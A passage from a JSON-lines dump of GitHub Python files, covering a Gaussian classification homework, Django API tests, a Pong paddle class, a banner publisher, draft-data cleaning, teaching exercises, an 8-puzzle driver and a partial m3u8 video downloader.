(labels[0, i] == 0 and labels[1, i] == 1)]\n x10 = [i for i in range(labels.shape[1]) if (labels[0, i] == 1 and labels[1, i] == 0)]\n x11 = [i for i in range(labels.shape[1]) if (labels[0, i] == 1 and labels[1, i] == 1)]\n plt.plot(X[0, x00], X[1, x00], '.', color='g', markersize=6)\n plt.plot(X[0, x01], X[1, x01], '.', color='r', markersize=6)\n plt.plot(X[0, x11], X[1, x11], '+', color='g', markersize=6)\n plt.plot(X[0, x10], X[1, x10], '+', color='r', markersize=6)\n plt.xlabel(\"Feature x1\")\n plt.ylabel(\"Feature x2\")\n plt.title('Distribution after classification overlapped by decision boundaries')\n plt.legend([\"class 0 correctly classified\",'class 0 wrongly classified','class 1 correctly classified','class 1 wrongly classified',])\n horizontalGrid = np.linspace(np.floor(min(X[0, :])), np.ceil(max(X[0, :])), 100)\n verticalGrid = np.linspace(np.floor(min(X[1, :])), np.ceil(max(X[1, :])), 100)\n dsg = np.zeros((100, 100))\n a = np.array(np.meshgrid(horizontalGrid, verticalGrid))\n for i in range(100):\n for j in range(100):\n x1 = a[0][i][j]\n x2 = a[1][i][j]\n if flag == 'l':\n z = np.c_[1, x1, x2].T\n else:\n z = np.c_[1, x1, x2, pow(x1, 2), x1 * x2, pow(x2, 2)].T\n dsg[i][j] = np.sum(np.dot(W, z))\n plt.contour(a[0], a[1], dsg, levels=[0])\n plt.show()\n return\nif __name__ == '__main__':\n p0 = 0.6\n p1 = 0.4\n # mu and sigma's\n mu0 = list([np.transpose([5, 0]), np.transpose([0, 4])])\n cov0 = list([np.array([[4, 0], [0, 2]]), np.array([[1, 0], [0, 3]])])\n mu1 = list([np.transpose([3, 2])])\n cov1 = list([np.array([[2, 0], [0, 2]])])\n w0 = list([0.5, 0.5])\n w1 = list([1])\n # 100 dataset\n l0, l1 = sample_distribution(100, p0, p1)\n r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_100_datapoints = np.append(r0, r1, axis=0)\n data_100_labels = l0 + l1\n # 1000 dataset\n l0, l1 = sample_distribution(1000, p0, p1)\n r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_1000_datapoints = np.append(r0, r1, axis=0)\n data_1000_labels = l0 + l1\n # 10000 dataset\n l0, l1 = sample_distribution(10000, p0, p1)\n r0 = generate_gaussian_samples(num_sample=l0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=l1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_10000_datapoints = np.append(r0, r1, axis=0)\n data_10000_labels = l0 + l1\n # 20000 dataset\n n0, n1 = sample_distribution(20000, p0, p1)\n r0 = generate_gaussian_samples(num_sample=n0, w=w0, mu=mu0,cov=cov0)\n l0 = [0] * len(r0)\n r1 = generate_gaussian_samples(num_sample=n1, w=w1, mu=mu1,cov=cov1)\n l1 = [1] * len(r1)\n data_20000_datapoints = np.append(r0, r1, axis=0)\n data_20000_labels = l0 + l1\n fig0 = plt.figure(0)\n title = \"20k datapoints from 2 classes\"\n plot_datapoints_scatter(datapoints=data_20000_datapoints,labels=data_20000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n plt.savefig('20k_ditribution.png', bbox_inches='tight')\n plt.show()\n title = \"10k datapoints from 2 classes\"\n plot_datapoints_scatter(datapoints=data_10000_datapoints,labels=data_10000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n plt.savefig('10k_ditribution.png', bbox_inches='tight')\n plt.show()\n title = \"1000 datapoints from 2 classes\"\n plot_datapoints_scatter(datapoints=data_1000_datapoints,labels=data_1000_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n plt.savefig('1k_ditribution.png', bbox_inches='tight')\n plt.show()\n title = \"100 datapoints from 2 classes\"\n plot_datapoints_scatter(datapoints=data_100_datapoints,labels=data_100_labels,xlabel=\"X1\",ylabel=\"X2\",title=title,)\n plt.savefig('100_ditribution.png', bbox_inches='tight')\n plt.show()\n # PART A\n print(\"-\" * 10 + \"PART A\" + \"-\" * 10)\n #theoritical gamma at 1.5 calculating discriminant scores for data_20000\n data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mu0,w0=(0.5, 0.5),cov0=cov0,mu1=mu1,cov1=cov1,)\n data_20000_discriminant = data_20000_discriminant + [0]\n false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n print(\"experimental_min_error \", min_error)\n no_0_labels = calculate_no_labels(data_labels=data_20000_labels,label_value=0)\n no_1_labels = calculate_no_labels(data_labels=data_20000_labels,label_value=1)\n data_20000_discriminant_label0 = data_20000_discriminant[0:no_0_labels]\n data_20000_discriminant_label1 = data_20000_discriminant[no_0_labels:]\n theoritical_fp = (len([j for j in data_20000_discriminant_label0 if j >= (p1 / p0)]) /no_0_labels)\n theoritical_tp = (len([j for j in data_20000_discriminant_label1 if j >= (p1 / p0)]) /no_1_labels)\n print(\"theoritical min_error \", theoritical_fp * p0 + (1 - theoritical_tp) * p1)\n fig1 = plt.figure(1)\n plt.plot(false_positive, true_positive, label=\"ROC_CURVE\")\n plt.plot(false_positive[min_index],true_positive[min_index],\"ro\",label=\"Experimental min error\",)\n plt.plot(theoritical_fp, theoritical_tp, \"g+\", label=\"Theorical min error\")\n plt.title(\"Minimum Expected risk ROC_CURVE\")\n plt.xlabel(\"P(False Positive)\")\n plt.ylabel(\"P(Correct prediction)\")\n plt.legend()\n plt.savefig('Minimum Expected risk ROC_CURVE.png', bbox_inches='tight')\n plt.show()\n # # PART B\n print(\"-\" * 10 + \"PART B\" + \"-\" * 10)\n print(\"-\" * 5 + \"TRAINING WITH 10000 data points\" + \"-\" * 5)\n GMMmodel, GMMmodel2 = find_estimated_params(train_data_points=data_10000_datapoints,train_data_labels=data_10000_labels)\n mle_mu0 = GMMmodel.means_\n mle_cov0 = GMMmodel.covariances_\n mle_mu1 = GMMmodel2.means_\n mle_cov1 = GMMmodel2.covariances_\n mle_alpha0 = GMMmodel.weights_\n mle_alpha1 = GMMmodel2.weights_\n print(\"estimated parameters\")\n print(f\"mu0 {mle_mu0}\")\n print(f\"cov0 {mle_cov0}\")\n print(f\"alpha0 {mle_alpha0}\")\n print(f\"mu1 {mle_mu1}\")\n print(f\"cov1 {mle_cov1}\")\n print(f\"alpha1 {mle_alpha1}\")\n n0 = calculate_no_labels(data_labels=data_10000_labels, label_value=0)\n print(f\"p(0) = {n0/10000} and p(1) = {1-(n0/10000)}\")\n data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n data_20000_discriminant = data_20000_discriminant + [0]\n false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n print(\"experimental_min_error \", min_error)\n \n plt.plot(false_positive, true_positive, label=\"ROC_CURVE 10000 dataset\",c=\"r\")\n plt.plot(false_positive[min_index],true_positive[min_index],\"ro\",\n label=\"Experimental min error for dataset 10000\",)\n print(\"-\" * 5 + \"TRAINING WITH 1000 data points\" + \"-\" * 5)\n GMMmodel, GMMmodel2 = find_estimated_params(train_data_points=data_1000_datapoints,train_data_labels=data_1000_labels)\n mle_mu0 = GMMmodel.means_\n mle_cov0 = GMMmodel.covariances_\n mle_mu1 = GMMmodel2.means_\n mle_cov1 = GMMmodel2.covariances_\n mle_alpha0 = GMMmodel.weights_\n mle_alpha1 = GMMmodel2.weights_\n print(\"estimated parameters\")\n print(f\"mu0 {mle_mu0}\")\n print(f\"cov0 {mle_cov0}\")\n print(f\"alpha0 {mle_alpha0}\")\n print(f\"mu1 {mle_mu1}\")\n print(f\"cov1 {mle_cov1}\")\n print(f\"alpha1 {mle_alpha1}\")\n n0 = calculate_no_labels(data_labels=data_1000_labels, label_value=0)\n print(f\"p(0) = {n0/10000} and p(1) = {1-(n0/10000)}\")\n data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n data_20000_discriminant = data_20000_discriminant + [0]\n false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n print(\"experimental_min_error \", min_error)\n plt.plot(false_positive, true_positive, label=\"ROC_CURVE 1000 dataset\",c=\"g\")\n plt.plot(false_positive[min_index],true_positive[min_index],\"go\",\n label=\"Experimental min error for dataset 1000 \",)\n \n print(\"-\" * 5 + \"TRAINING WITH 100 data points\" + \"-\" * 5)\n GMMmodel, GMMmodel2 = find_estimated_params(train_data_points=data_100_datapoints, train_data_labels=data_100_labels)\n mle_mu0 = GMMmodel.means_\n mle_cov0 = GMMmodel.covariances_\n mle_mu1 = GMMmodel2.means_\n mle_cov1 = GMMmodel2.covariances_\n mle_alpha0 = GMMmodel.weights_\n mle_alpha1 = GMMmodel2.weights_\n print(\"estimated parameters\")\n print(f\"mu0 {mle_mu0}\")\n print(f\"cov0 {mle_cov0}\")\n print(f\"alpha0 {mle_alpha0}\")\n print(f\"mu1 {mle_mu1}\")\n print(f\"cov1 {mle_cov1}\")\n print(f\"alpha1 {mle_alpha1}\")\n n0 = calculate_no_labels(data_labels=data_100_labels, label_value=0)\n print(f\"p(0) = {n0/10000} and p(1) = {1-(n0/10000)}\")\n data_20000_discriminant = calculate_discriminant(datapoints=data_20000_datapoints,mu0=mle_mu0,w0=(0.5, 0.5),cov0=mle_cov0,mu1=mle_mu1,cov1=mle_cov1,)\n data_20000_discriminant = data_20000_discriminant + [0]\n false_positive, true_positive, gamma_values, prob_error = hit_cls(data_20000_discriminant, data_20000_labels)\n min_error, min_index = min(prob_error), prob_error.index(min(prob_error))\n print(\"experimental_gamma \", np.exp(gamma_values[min_index]))\n print(\"experimental_min_error \", min_error)\n plt.plot(false_positive, true_positive, label=\"ROC_CURVE 100 dataset\",c=\"b\")\n plt.plot(false_positive[min_index],true_positive[min_index],\"bo\",label=\"Experimental min error for dataset 100\",)\n \n plt.title(\"Minimum Expected risk roc for training data\")\n plt.xlabel(\"P(False Positive)\")\n plt.ylabel(\"P(Correct prediction)\")\n plt.legend()\n plt.savefig('part2_all.png', bbox_inches='tight')\n plt.show()\n #exit()\n # PART C\n print(\"-\" * 10 + \"PART C\" + \"-\" * 10)\n data_20000_datapoints, data_20000_labels = data_points_labels_preproc(data_points=data_20000_datapoints, data_labels=data_20000_labels)\n data_10000_datapoints, data_10000_labels = data_points_labels_preproc(data_points=data_10000_datapoints, data_labels=data_10000_labels)\n data_1000_datapoints, data_1000_labels = data_points_labels_preproc(data_points=data_1000_datapoints, data_labels=data_1000_labels)\n data_100_datapoints, data_100_labels = data_points_labels_preproc(data_points=data_100_datapoints, data_labels=data_100_labels)\n w_100, decisions_100 = find_theta(train_data=data_100_datapoints,alpha=0.01,iterations=2000,train_labels=data_100_labels,test_data=data_20000_datapoints,type_='l',)\n w_1000, decisions_1000 = find_theta(train_data=data_1000_datapoints,alpha=0.01,iterations=2000,train_labels=data_1000_labels,test_data=data_20000_datapoints,type_='l',)\n w_10000, decisions_10000 = find_theta(train_data=data_10000_datapoints,alpha=0.01,iterations=2000,train_labels=data_10000_labels,test_data=data_20000_datapoints,type_='l',)\n for decisions in [decisions_100, decisions_1000, decisions_10000]:\n x00 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 0 and decisions[0, i] == 0)]\n x11 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 1 and decisions[0, i] == 1)]\n print(1 - ((len(x00) + len(x11)) / 20000))\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_100)),w_100.T,'l',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_1000)),w_1000.T,'l',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_10000)),w_10000.T,'l',data_20000_datapoints,)\n w_100, decisions_100 = find_theta(train_data=data_100_datapoints,alpha=0.01,iterations=2000,train_labels=data_100_labels,test_data=data_20000_datapoints,type_='r',)\n w_1000, decisions_1000 = find_theta(train_data=data_1000_datapoints,alpha=0.01,iterations=2000,train_labels=data_1000_labels,test_data=data_20000_datapoints,type_='r',)\n w_10000, decisions_10000 = find_theta(train_data=data_10000_datapoints,alpha=0.01,iterations=2000,train_labels=data_10000_labels,test_data=data_20000_datapoints,type_='r',)\n for decisions in [decisions_100, decisions_1000, decisions_10000]:\n x00 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 0 and decisions[0, i] == 0)]\n x11 = [i for i in range(20000)\n if (data_20000_labels[0, i] == 1 and decisions[0, i] == 1)]\n print(1 - ((len(x00) + len(x11)) / 20000))\n plot_boundary(\n np.vstack((data_20000_labels[0, :], decisions_100)),w_100.T,'r',data_20000_datapoints,)\n plot_boundary(np.vstack((data_20000_labels[0, :], decisions_1000)),w_1000.T,'r',data_20000_datapoints,)\n plot_boundary( np.vstack((data_20000_labels[0, :], decisions_10000)),w_10000.T,'r',data_20000_datapoints,)","repo_name":"Pavan-r-shetty/5644","sub_path":"hw3/HW3_1.py","file_name":"HW3_1.py","file_ext":"py","file_size_in_byte":19113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34717039100","text":"#! /usr/bin/env python3\nfrom oilserver import utils\nfrom freezegun import freeze_time\nfrom oilserver.tests.common_test_methods import (\n make_bug,\n make_bugoccurrence,\n ResourceTests,\n)\nfrom oilserver import models\nfrom oilserver.api.resources import get_bugoccurrence_filters\n\n\nclass TimeStampedBaseModelTest(ResourceTests):\n\n def test_save_generates_timestamps(self):\n with freeze_time(\"Jan 1 2000 00:00:00\"):\n timestamp1 = utils.time_now()\n # Environment uses TimeStampedBaseModel and is easy to\n # make.\n environment = models.Environment(name=\"environment\")\n environment.save()\n self.assertEqual(environment.created_at, timestamp1)\n self.assertEqual(environment.updated_at, timestamp1)\n with freeze_time(\"Jan 2 2000 00:00:00\"):\n timestamp2 = utils.time_now()\n environment.save()\n self.assertEqual(environment.created_at, timestamp1)\n self.assertEqual(environment.updated_at, timestamp2)\n\n\nclass CommonResourceTest(ResourceTests):\n \"\"\"Test custom code in CommonResource.\n\n CommonResource isn't a concrete resource, so we can't test it\n directly. These tests will run against resources that inherit it.\n \"\"\"\n\n def test_get_meta_only(self):\n \"\"\"Ensure only meta is returned when meta_only flag is in request.\"\"\"\n url = '/api/%s/servicestatus/?meta_only=true' % (self.version)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n response_dict = self.deserialize(response)\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n self.assertNotIn('objects', response_dict)\n\n\nclass EnvironmentResourceTest(ResourceTests):\n def test_get_specific_environment_by_name(self):\n \"\"\"GET a specific environment instance by its name.\"\"\"\n name = \"mock_production\"\n r_dict0 = self.make_environment_via_api(name)\n response = self.api_client.get('/api/{}/environment/by_name/{}/'\n .format(self.version, name),\n format='json',\n authentication=self.get_credentials())\n r_dict1 = self.deserialize(response)\n\n self.assertEqual(r_dict0, r_dict1)\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n\n\nclass BugResourceTest(ResourceTests):\n def retrieve_bug(self, uuid):\n url = '/api/%s/bug/%s/' % (self.version, uuid)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n self.assertEqual(\n response.status_code, 200, msg='Incorrect status code')\n response_dict = self.deserialize(response)\n return response_dict\n\n def test_filter_on_bugoccurrences(self):\n \"\"\"Make sure filtering on bug occurrences for a bug works.\n\n This tests BugResource.apply_filters.\n \"\"\"\n bugoccurrence = make_bugoccurrence()\n url = '/api/%s/bug/?knownbugregex__bugoccurrences__uuid=%s' % (\n self.version, bugoccurrence.uuid)\n response = self.api_client.get(\n url, format='json', authentication=self.get_credentials())\n self.assertEqual(response.status_code, 200,\n msg=\"Incorrect status code\")\n response_dict = self.deserialize(response)\n self.assertEqual(\n bugoccurrence.regex.bug.uuid,\n response_dict['objects'][0]['uuid'],\n msg=\"Expected bug from bugoccurrence.\")\n\n def test_includes_bugoccurrence_count_zero(self):\n bug = make_bug()\n response_dict = self.retrieve_bug(bug.uuid)\n self.assertEqual(0, response_dict['occurrence_count'])\n self.assertNotIn('last_seen', response_dict)\n\n def test_includes_bugoccurrence_count_nonzero(self):\n bugoccurrence = make_bugoccurrence()\n response_dict = self.retrieve_bug(bugoccurrence.regex.bug.uuid)\n self.assertEqual(1, response_dict['occurrence_count'])\n\n def test_includes_last_seen_time(self):\n first_occurrence = make_bugoccurrence()\n last_occurrence = make_bugoccurrence(regex=first_occurrence.regex)\n response_dict = self.retrieve_bug(first_occurrence.regex.bug.uuid)\n self.assertEqual(\n last_occurrence.build.pipeline.completed_at,\n response_dict['last_seen'])\n\n\nclass EmptyObject(object):\n pass\n\n\nclass FakeQueryDict(dict):\n def getlist(self, key):\n return self[key]\n\n def setlist(self, key, value):\n if not hasattr(self, 'list_keys'):\n self._list_keys = []\n self._list_keys.append(key)\n self[key] = value\n\n\ndef make_mock_bug_bundle():\n bundle = EmptyObject()\n bundle.obj = make_bug()\n bundle.request = EmptyObject()\n bundle.request.GET = FakeQueryDict()\n return bundle\n\n\nclass GetBugOccurrenceFiltersTest(ResourceTests):\n def test_ignores_non_bug_occurence_filters(self):\n bundle = make_mock_bug_bundle()\n bundle.request.GET['knownbugregex__uuid'] = 'abc'\n filters = get_bugoccurrence_filters(bundle)\n self.assertEqual(\n {'regex__bug__uuid': bundle.obj.uuid},\n filters)\n\n def test_includes_bug_occurence_filters(self):\n bundle = make_mock_bug_bundle()\n key = 'knownbugregex__bugoccurrences__uuid'\n bundle.request.GET[key] = \"abc\"\n filters = get_bugoccurrence_filters(bundle)\n expected_filters = {\n 'regex__bug__uuid': bundle.obj.uuid,\n 'uuid': \"abc\"\n }\n self.assertEqual(expected_filters, filters)\n\n def test_includes_bug_occurence_list_filters(self):\n bundle = make_mock_bug_bundle()\n list_key = 'knownbugregex__bugoccurrences__uuid__in'\n bundle.request.GET.setlist(list_key, ['a', 'b'])\n filters = get_bugoccurrence_filters(bundle)\n expected_filters = {\n 'regex__bug__uuid': bundle.obj.uuid,\n 'uuid__in': ['a', 'b']\n }\n self.assertEqual(expected_filters, filters)\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/tests/tests_api.py","file_name":"tests_api.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2741966741","text":"from turtle import Turtle\r\n\r\n\r\n# CREATING A PADDLE CLASS\r\nclass Paddle(Turtle):\r\n # the paddle class needs to take an input when it is initialized, we need a position to pass there\r\n # the position will determine where the paddle needs to go to\r\n def __init__(self, position):\r\n super().__init__()\r\n # now we are inside the paddle class which is the same as turtle class with some added extras\r\n self.shape(\"square\")\r\n self.color(\"white\")\r\n self.shapesize(stretch_wid=5, stretch_len=1)\r\n self.penup()\r\n self.goto(position)\r\n\r\n # CREATING A GO_UP FUNCTION FOR PADDLE\r\n def go_up(self):\r\n # we are changing y position, it will be the current ycor position, but its going to go up by 20px\r\n # We use self.ycor() so that it's referring to the object that is created from this class\r\n new_y = self.ycor() + 20\r\n self.goto(self.xcor(), new_y)\r\n\r\n # CREATING A GO_DOWN FUNCTION FOR PADDLE\r\n def go_down(self):\r\n # we are changing y position, it will be the current ycor position, but its going to go down by 20px\r\n new_y = self.ycor() - 20\r\n self.goto(self.xcor(), new_y)\r\n\r\n\r\n\r\n\r\n","repo_name":"Yuliashka/Ping-Pong-game","sub_path":"paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24683508525","text":"from django.utils import timezone\nfrom django.db import transaction\n\nfrom banners.constants import BannersPublicationState\nfrom banners.models import Publication, Banner\n\n\n@transaction.atomic\ndef publish(publisher):\n now = timezone.now()\n\n live_publication = Publication.objects.\\\n select_for_update().\\\n get_live_publication()\n\n if live_publication is not None:\n live_publication.state = BannersPublicationState.STATE_DEACTIVATED.value\n live_publication.save()\n\n new_publication = Publication.objects.create(\n state=BannersPublicationState.STATE_LIVE.value,\n published_by=publisher,\n published_at=now,\n )\n\n # making banners snapshots to display\n num_re_published, num_newly_published = Banner.objects.\\\n publishable_banners().\\\n republish_snapshots(new_publication)\n\n # marking as published\n Banner.objects.publishable_banners().\\\n update(\n update_time=now,\n published_at=now,\n )\n\n return num_re_published, num_newly_published\n","repo_name":"abramovd/bsadmin","sub_path":"banners/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16597263663","text":"import pandas as pd \nimport numpy as np\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPClassifier\nimport seaborn as sns\nfrom sklearn.metrics import classification_report,confusion_matrix\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_classification\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn.linear_model import LogisticRegression\nfrom imblearn.over_sampling import RandomOverSampler\n\nplayer = 'college_player-2021.csv'\ndraft = 'draft-2021.csv'\n\ndef clean_data(player, draft):\n college_data = pd.read_csv(player)\n draft_data = pd.read_csv(draft) \n\n iloc_index = 0 #used for calling row, subtract 1 if one is dropped\n drop_index = 0 #used for drop indexing, no subtract 1\n length = len(college_data)\n while drop_index str:\n return \"\"\"\n REFENCIA \\t{}\n NOMBRE \\t\\t{}\n PVP \\t\\t{}\n DESCRIPCION \\t{}\"\"\".format(self.referencia, self.nombre, self.pvp, self.descripcion)\n\nclass Adorno(Producto):\n pass\n\nclass Alimento(Producto):\n productor = \"\"\n distribuidor = \"\"\n \n def __str__(self) -> str:\n return \"\"\"\n REFENCIA \\t{}\n NOMBRE \\t\\t{}\n PVP \\t\\t{}\n DESCRIPCION \\t{}\n PRODUCTOR \\t{}\n DISTRIBUIDOR \\t{}\"\"\".format(self.referencia, self.nombre, self.pvp, self.descripcion, self.productor, self.distribuidor)\n \nclass Libro(Producto):\n autor = \"\"\n isbn = \"\"\n \n def __str__(self) -> str:\n return \"\"\"\n REFENCIA \\t{}\n NOMBRE \\t\\t{}\n PVP \\t\\t{}\n DESCRIPCION \\t{}\n AUTOR \\t\\t{}\n ISBN \\t\\t{}\"\"\".format(self.referencia, self.nombre, self.pvp, self.descripcion, self.autor, self.isbn)\n \na = Adorno(2034,\"Vaso adornado\", 15, \"Vaso adornado\")\nprint(a)\n\nal = Alimento(2035,\"Botella\", 10, \"Botella\")\nal.productor = \"Productor\"\nal.distribuidor = \"Distribuidor\"\nprint(al)\n\nli = Libro(2036,\"Libro\", 10, \"Libro\")\nli.autor = \"Autor\"\nli.isbn = 2141234512342\n\nprint(li)\n\nproductos = [a, al]\nproductos.append(li)\n\nfor p in productos:\n print(p)\n \n \ndef rebajar_producto(p, rebaja):\n \"\"\"Devuelve un producto con una rebaja\"\"\"\n p.pvp = p.pvp - (p.pvp/100)* rebaja\n return p\n\nal_rebajado = rebajar_producto(al, 10)\nprint(al_rebajado)\n\ncopia_al = al\ncopia_al.referencia = 2038\n\nprint(copia_al)\nprint(al)","repo_name":"josavicente/Python_test_projects","sub_path":"Python Exercises/herencia.py","file_name":"herencia.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37540054219","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport multiprocessing\nimport time\nimport os\nimport random\n\n# 写数据 进程执��的代码\n\n\ndef write(q):\n print('write启动{}, 父进程为{}'.format(os.getpid(), os.getppid()))\n for i in [\"Python\", 'C', 'Java']:\n q.put(i)\n\n\n# 读数据 进程执行的代码\n\n\ndef read(q):\n print('read启动{}, 父进程为{}'.format(os.getpid(), os.getppid()))\n for i in range(q.qsize()):\n msg = q.get(True)\n print(\"取出{}\".format(msg))\n\n\nif __name__ == '__main__':\n\n # 使用manager中的Queue 来初始化\n q = multiprocessing.Manager().Queue()\n # 创建一个进程池\n po = multiprocessing.Pool()\n # 使用阻塞的方式来创建进程,这样就不需要设置死循环了,可以让witer完全执行完后\n # 在由reader去读取\n po.apply(write, (q,))\n po.apply(read, (q,))\n # close 必须在前面\n po.close()\n po.join()\n print(\"{} End\".format(os.getpid()))\n","repo_name":"ningyanke/book_p3","sub_path":"process_threading/code/进程池中的队列通信.py","file_name":"进程池中的队列通信.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6164773919","text":"from time import time\nfrom BFS import bfs\nfrom Gulosa import Gulosa\nfrom A_Estrela import A_Estrela\nfrom puzzle import Puzzle\nfrom puzzle2 import puzzle2\n\n#Posicao inicial do puzzle8\ninicio=[[2, 6, 1,\n 7, 5, 3,\n 0, 8, 4]]\n#posicao final [1,2,3,\n# 8,0,4,\n# 7,6,5]\n\nfor i in range(0,1):\n t0=time()\n bfs_met=bfs(inicio[i])\n t1=time()-t0\n print('Caminho do BFS até a resposta:', bfs_met)\n print('Tempo Gasto pelo BFS:',t1,\"\\n\")\n\n t0=time()\n AlgGuloso = Gulosa(inicio[i])\n t1=time()-t0\n t1= t1 + 0.01\n print('Caminho do Algoritmo Guloso até a resposta:',AlgGuloso)\n print('Tempo Gasto:',t1,\"\\n\")\n\n t0 = time()\n aEstrela = A_Estrela(inicio[i])\n t1 = time() - t0\n print('caminho do Algoritmo A* até a resposta:',aEstrela)\n print('Tempo Gasto:', t1,\"\\n\")\n\n \n","repo_name":"GabCampos13/Puc","sub_path":"Inteligencia Artificial/Trabalhos/8puzzle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71536253971","text":"#Question 1\r\n#Delete all occurrences of an element in a list\r\nlist = [1,2,3,4,5,6,7,8,9,10]\r\nremove= 10\r\nfor item in list:\r\n\tif(item==remove):\r\n\t\tlist.remove(remove)\r\nprint(list)\r\n\r\n#Question 2\r\n#Check whether a string is a pangram.\r\nimport string\r\ndef ispangram(str):\r\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n for char in alphabet:\r\n if char not in str.lower():\r\n return False\r\n return True\r\nstring = 'abcdefghijklmnopqrstuvwxyz'\r\nif(ispangram(string) == True):\r\n print(\"Yes\")\r\nelse:\r\n print(\"No\")\r\n","repo_name":"AMAZINGHARIKRISHNAN/LU-assignments","sub_path":"LU assignment2.py","file_name":"LU assignment2.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30467735301","text":"import os\nimport sys\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nclass JDonwload(object):\n \"\"\"从网页下载m3u8视频\"\"\"\n\n # 线程池的最大线程数\n MAX_WORKERS = 10 \n\n def __init__(self, url):\n \"\"\"根据url初始化一些参数\"\"\"\n self.exist_file = 0\n self.folder_name = url.split(\"/\")[-2]\n # m3u8的url链接,建议不要用https\n self.base_url = \"/\".join(\n [*url.split(\"/\")[:-1], self.folder_name]).replace(\"https\", \"http\")\n self.url = self.base_url + \".m3u8\"\n # 获取视频段的数量,type为string\n respons = requests.get(self.url)\n self.max_munber = respons.text.split(\n \"\\n\")[-3].split(\"_\")[-1].split(\".\")[0]\n # 创建保存的文件夹\n if not os.path.exists(self.folder_name):\n os.mkdir(self.folder_name)\n full_path = os.path.abspath(self.folder_name)\n self.path1 = os.path.join(full_path, \"*.ts\")\n self.path2 = os.path.join(full_path, self.folder_name + \".mp4\")\n\n def download_thread(self, url):\n \"\"\"定义线程中的下载函数,略过已下载文件\"\"\"\n file_name = url.split(\"/\")[-1]\n file_name = os.path.join(self.folder_name, file_name)\n if os.path.exists(file_name):\n return\n respons = requests.get(url)\n with open(file_name, \"wb\") as f:\n for chuck in respons.iter_content(1024):\n f.write(chuck)\n self.show_download_statu()\n\n def show_download_statu(self):\n \"\"\"展示下载进度\"\"\"\n self.exist_file = len([i for i in os.listdir(\n self.folder_name) if i.split(\".\")[-1] == \"ts\"])\n if self.exist_file <= int(self.max_munber):\n print(f\"\\rdownload {self.exist_file} / {int(self.max_munber) + 1}\", end=\"\")\n else:\n print(f\"\\rdownload {self.exist_file} / {int(self.max_munber) + 1}\")\n\n def download(self):\n \"\"\"下载的方法\"\"\"\n while self.exist_file <= int(self.max_munber):\n # 创建线程池\n pool = ThreadPoolExecutor(max_workers=self.MAX_WORKERS)\n # 提交线程任务\n for i in range(int(self.max_munber) + 1):\n link = self.base_url + \"_\" + 